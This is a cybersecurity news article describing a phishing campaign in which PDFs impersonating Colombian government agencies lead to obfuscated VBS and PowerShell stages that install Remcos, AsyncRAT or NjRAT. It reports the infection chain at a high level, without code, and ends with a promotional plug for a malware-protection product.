Hackers Employ Weaponized PDFs to Distribute Remcos RAT

Cyber Attack

Sophisticated Cyberattack Targets Latin American Individuals and Organizations with Weaponized PDFs

A complex cybercriminal campaign has been launched, targeting individuals and organizations across Latin America by employing weaponized PDF files to distribute dangerous Remote Access Trojans (RATs) like Remcos.

This alarming development has prompted concerns about the region's cybersecurity readiness.


Attack Method

The attackers initiate the infection by masquerading as Colombian government agencies and sending out PDF documents that falsely accuse recipients of traffic violations or other legal issues.

These documents contain links that, when clicked, prompt the download of a ZIP file.

Within this file is a Visual Basic Script (VBS) obfuscated with dead code to evade detection.

The campaign cleverly impersonates official communication from entities like COLOMBIANA DE MUNICIPIOS, leveraging trust in government institutions to deceive victims.

The choice of lures suggests a targeted approach to individuals and potentially organizations associated with the Colombian government infrastructure.

Upon execution, the VBS script triggers a PowerShell script that performs two crucial actions:

  1. Retrieves the payload’s address from a legitimate storage service, such as textbin.net, and then downloads it.
  2. Executes the payload from the provided address, which could include various legitimate services like cdn.discordapp.com, pasteio.com, hidrive.ionos.com, and wtools.io.

A recent tweet by ANY.RUN sheds light on the ongoing cyberattack campaign in Latin America, where users are coerced into initiating malware infections.


RATs Used

This intricate execution chain delivers a RAT as the final payload, with attackers employing several notorious RATs, including AsyncRAT, NjRAT, and Remcos.

These RATs grant cybercriminals remote control over infected systems, enabling them to steal sensitive information, monitor user actions, and potentially deploy further malware.

Cybersecurity experts warn that while this campaign focuses on Latin America, similar tactics could be employed against targets in other regions.

Organizations and individuals are advised to remain vigilant, educate themselves on these threats, and implement robust security measures to defend against such sophisticated attacks.

Perimeter81 malware protection offers a solution to block malware, including Trojans, ransomware, spyware, rootkits, worms, and zero-day exploits, providing essential defence for networks.